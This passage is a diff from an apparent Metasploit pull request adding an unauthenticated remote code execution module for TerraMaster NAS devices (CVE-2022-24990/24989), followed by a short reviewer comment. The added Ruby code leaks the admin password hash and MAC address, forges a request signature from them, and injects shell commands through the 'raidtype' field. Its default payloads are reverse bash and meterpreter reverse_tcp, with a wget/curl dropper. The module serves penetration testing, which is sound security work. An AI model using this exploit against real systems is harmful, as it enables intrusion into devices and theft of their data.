modules/exploits/linux/http/terramaster_unauth_rce_cve_2022_24990.rb

```diff
@@ -0,0 +1,198 @@
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => ['bourne', 'wget', 'curl'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8181,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Path to Terramaster Web console', '/'])
+    ])
+  end
+
+  def get_data
+    # Initialise variable data to store the leaked data
+    @data = {}
+
+    # Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
+    # CVE-2022-24990
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/webNasIPS'),
+      'headers' => {
+        'User-Agent' => 'TNAS'
+      }
+    })
+    if res && res.code == 200 && res.body.include?('webNasIPS successful')
+      # Parse the JSON response and get the data such as admin password hash and MAC address
+      res_json = res.get_json_document
+      unless res_json.blank?
+        @data['password'] = res_json['data'].split('PWD:')[1].split('SAT')[0].strip
+        @data['mac'] = res_json['data'].split('mac":"')[1].split('"')[0].tr(':', '').strip
+        @data['key'] = @data['mac'][6..11] # last three MAC address entries
+        @data['timestamp'] = Time.new.to_i.to_s
+        # derive signature
+        @data['signature'] = tos_encrypt_str(@data['key'], @data['timestamp'])
+      end
+    end
+  end
+
+  def tos_encrypt_str(key, str_to_encrypt)
+    id = key + str_to_encrypt
+    return Digest::MD5.hexdigest(id.encode('utf-8'))
+  end
+
+  def execute_command(cmd, _opts = {})
+    # Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
+    # CVE-2022-24989
+    diskstring = Rex::Text.rand_text_alpha_upper(4..8)
+
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'module', 'api.php?mobile/createRaid'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'User-Agent' => 'TNAS',
+        'Authorization' => @data['password'],
+        'Signature' => @data['signature'],
+        'Timestamp' => @data['timestamp']
+      },
+      'vars_post' => {
+        'raidtype' => ';' + cmd,
+        'diskstring' => diskstring.to_s
+      }
+    })
+  end
+
+  def get_terramaster_info
```

Comment:
This could be factorised into a mixin to reduce deduplication between the various TerrorMaster exploits, but it should go into another PR :)